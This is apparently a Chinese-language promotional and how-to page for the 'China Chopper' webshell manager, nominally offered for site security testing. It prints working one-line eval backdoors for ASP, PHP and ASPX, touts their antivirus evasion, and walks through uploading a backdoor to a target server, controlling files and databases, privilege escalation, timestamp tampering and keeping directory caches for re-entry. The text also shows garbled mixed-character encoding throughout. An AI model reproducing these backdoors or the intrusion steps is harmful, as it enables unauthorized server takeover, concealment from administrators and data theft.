中國(guó)菜刀 (chopper)  是國(guó)內(nèi)牛人開(kāi)發(fā)的方便的檢測(cè)后門是否可以利用，方便站長(zhǎng)做網(wǎng)站安全檢測(cè)。最近有好心的朋友提供了我們的一些不維護(hù)網(wǎng)站的存在注入問(wèn)題的幾個(gè)頁(yè)面，正好用這個(gè)工具檢測(cè)了下， 要不是服務(wù)器安全設(shè)置好了， 否則什么都是別人的了。

解壓密碼：okjb51

如果你是站長(zhǎng)，你還在用FTP來(lái)管理你的網(wǎng)站嗎？
為什么不試一下“中國(guó)菜刀”呢，這是一款專業(yè)的網(wǎng)站管理工具。
用途廣泛，使用方便，小巧實(shí)用。
同時(shí)，還能連接管理幾乎所有主流的數(shù)據(jù)庫(kù)。
支持的網(wǎng)站腳本有：PHP，ASP.NET，ASP, 后續(xù)將支持其它網(wǎng)站腳本的連接管理。
其它功能：WEB瀏覽器(POST瀏覽/自定義COOKIE瀏覽/自定義JS),網(wǎng)站爬行(自動(dòng)保存目錄結(jié)構(gòu))，WEB安全掃描。
在非簡(jiǎn)體中文環(huán)境下使用，自動(dòng)切換到英文界面。

說(shuō)起菜刀，就不得不提起菜刀的作者，作者是一個(gè)退伍軍人，生長(zhǎng)在一個(gè)貧窮的農(nóng)村，據(jù)說(shuō)初中也沒(méi)讀完，英語(yǔ)更是不咋地，但他卻自學(xué)掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand等等，當(dāng)初在六七年前臺(tái)灣鬧獨(dú)立的時(shí)候，他在國(guó)民黨和民進(jìn)黨的網(wǎng)站上留下了“只有一個(gè)中國(guó)”的黑頁(yè)，一舉成名。
作者是一個(gè)樸實(shí)，低調(diào)的技術(shù)牛人，他這些年留下的作品很多，中國(guó)菜刀是他最新的一個(gè)作品，從他之前的作品WEBSHELL管理器的基礎(chǔ)上修改而來(lái)，功能更加的強(qiáng)大。
你見(jiàn)過(guò)很強(qiáng)大的ASP后門，很強(qiáng)大的PHP后門，很強(qiáng)大的ASPX后門，那你見(jiàn)過(guò)很強(qiáng)大的asp,aspx,php三合一后門么........，沒(méi)有吧，尤其是這個(gè)后門，只有一句話。
Asp環(huán)境：<%eval request("a")%>
Php環(huán)境：<?php @eval($_POST['a']);?>
Aspx環(huán)境：<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

是不是很震憾，很不可思議，是的，我剛接觸的時(shí)候，也是這樣的想法，就這三句話，一個(gè)名不見(jiàn)經(jīng)傳的“中國(guó)菜刀”，就可以代替我那搜集了幾年，大大小小幾百個(gè)多種平臺(tái)多種環(huán)境的腳本后門？，事實(shí)證明，我錯(cuò)了，原來(lái)“中國(guó)菜刀”不僅僅可以代替那些后門，而且他的功能超出我的想象，就讓我慢慢說(shuō)明吧。
1.就從最基本的講起，你的腳本是不是經(jīng)常被殺，你怎么變形都被殺，，傳到服務(wù)器被殺導(dǎo)致被管理員發(fā)現(xiàn)，結(jié)果你的權(quán)限就沒(méi)了，殺到你欲哭無(wú)淚。菜刀的一句話后門，可以避免這個(gè)問(wèn)題，只有短短的一行代碼，永遠(yuǎn)不會(huì)被查殺。
2.你是不是很郁悶?zāi)愕暮箝T傳到服務(wù)器上連他媽都不認(rèn)識(shí)了，框架變形，字體變框框，點(diǎn)擊菜單無(wú)效，這個(gè)是因?yàn)橄到y(tǒng)語(yǔ)言不兼容造成的，菜刀是UINCODE方式編譯,支持多國(guó)語(yǔ)言輸入顯示,完全不存在兼容性問(wèn)題。
3.你是不是有很多webshell，你每次都拿記事本記下來(lái)，需要的時(shí)候，又去翻半天，弄得你很累很沒(méi)脾氣。有了“菜刀”，你可以很方便管理你的webshell，所有的記錄都保存在加密的本地?cái)?shù)據(jù)庫(kù)里，而且支持webshell分類，讓你管理得井井有條。菜刀不僅有臨時(shí)鎖定功能，方便你離開(kāi)電腦的那小會(huì)時(shí)間不被別人偷你的webshell，也有加密功能，不輸對(duì)密碼，HOHO，偷了你的數(shù)據(jù)也沒(méi)用。
4.再來(lái)說(shuō)說(shuō)數(shù)據(jù)庫(kù)管理，這個(gè)是菜刀最最強(qiáng)大的功能，精通各平臺(tái)主流數(shù)據(jù)庫(kù)的作者，把這個(gè)功能寫的是淋漓盡致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等數(shù)據(jù)庫(kù)，支持不是最主要的，功能強(qiáng)大，人性化才是最主要的，“菜刀”的數(shù)據(jù)庫(kù)操作界面，內(nèi)置了常用的數(shù)據(jù)庫(kù)語(yǔ)句，非常直觀的表列名瀏覽功能，自動(dòng)顯示表名，列名，查詢語(yǔ)句，非常人性化的設(shè)計(jì)，更內(nèi)置了不少自建的函數(shù)，方便不懂?dāng)?shù)據(jù)庫(kù)的菜鳥(niǎo)，都能查閱數(shù)據(jù)庫(kù)里的數(shù)據(jù)，再說(shuō)個(gè)“菜刀”數(shù)據(jù)庫(kù)管理的一個(gè)小技巧，對(duì)于access數(shù)據(jù)庫(kù)，可以在菜刀的webshell操作界面，對(duì)著MDB文件點(diǎn)右鍵，點(diǎn)Access Management，就直接進(jìn)入Access的數(shù)據(jù)庫(kù)操作界面了，方便吧，嘿嘿??！
5.再說(shuō)說(shuō)提權(quán)這塊，webshell的提權(quán)總是最讓人關(guān)心的，說(shuō)到提權(quán)，就不能說(shuō)到webshell上的cmd執(zhí)行了，有些朋友并不了解菜刀的自定義CMD路徑功能，有兩種方法可以設(shè)置指定的cmd路徑，一就是在cmd操作界面，輸入setp d:\cmd.exe，就可以了，或者把cmd.exe上傳到目錄，然后點(diǎn)右鍵,點(diǎn)virtual terminal file，就可以進(jìn)入自定義CMD.EXE路徑的命令行了，同樣的，再給個(gè)cmd使用的小技巧，在菜刀的命令行里，可以使用cd等命令跳轉(zhuǎn)目錄，方便吧，嘿嘿?。∴?，另外，新版菜刀新增常用目錄管理功能，你可以把你常用的目錄或者提權(quán)的目錄加進(jìn)菜刀里，這樣很方便你提權(quán)或者日常工作，是不是比那些固定了提權(quán)目錄的腳本后門要牛B的多啊，哈哈。
6.還有菜刀的webshell上的文件功能功能，也是非常人性化的，文件夾和文件的圖標(biāo)完全模枋windows,，文件日期，文件大小，文件權(quán)限，一目了然，尤其是修改文件時(shí)間功能，非常的方便，直接對(duì)著要修改時(shí)間的文件點(diǎn)右鍵,modify the file time，然后在文件的時(shí)間那欄，輸入時(shí)間，回車，就修改完了。當(dāng)然，菜刀的文件管理還有新建，刪除，上傳，下載，編輯功能，這些大同小異，就不一一細(xì)說(shuō)了。不過(guò)有個(gè)功能，還是要重點(diǎn)說(shuō)明的，那就是目錄緩存功能，菜刀可以把瀏覽過(guò)的webshell目錄都緩存在本地，這樣可以方便下次訪問(wèn)的時(shí)候更加快捷，最重要的是，當(dāng)哪天你的權(quán)限丟了，起碼你還有對(duì)方服務(wù)器的文件目錄結(jié)構(gòu)，方便再一次滲透。
說(shuō)完大家都有的腳本后門功能，現(xiàn)在來(lái)說(shuō)點(diǎn)特別的菜刀功能，非常特別跟實(shí)用的哦。菜刀的前身是WEBSHELL管理器，再結(jié)合了作者之前的web管理軟件等幾個(gè)工具的優(yōu)點(diǎn)，實(shí)在是大殺器的集合體。

使用方法

這里以php為例
首先我們先將php一句話木馬上傳到目標(biāo)服務(wù)器中，用菜刀去嘗試連接

在地址中填寫上傳一句話木馬的地址，在后面的方框中填寫所要連接的參數(shù)（也就是代碼中的’x’）

打開(kāi)菜刀，空白處右鍵添加

設(shè)置好后我們雙擊點(diǎn)開(kāi)

填入地址、密碼 等參數(shù)

添加完成之后就可以對(duì)目標(biāo)服務(wù)器進(jìn)行控制，可以對(duì)文件進(jìn)行相關(guān)的操作，也可以對(duì)數(shù)據(jù)庫(kù)進(jìn)行操作，也可以創(chuàng)建一個(gè)用戶。

我們將a.txt刪除，然后去服務(wù)器上查看，發(fā)現(xiàn)服務(wù)器上的a.txt文件也被刪除了，這就是利用了上傳漏洞進(jìn)行攻擊。

更新日志

最新版本1.5，官方已經(jīng)無(wú)法訪問(wèn)，建議再虛擬機(jī)中執(zhí)行，以防止有后門。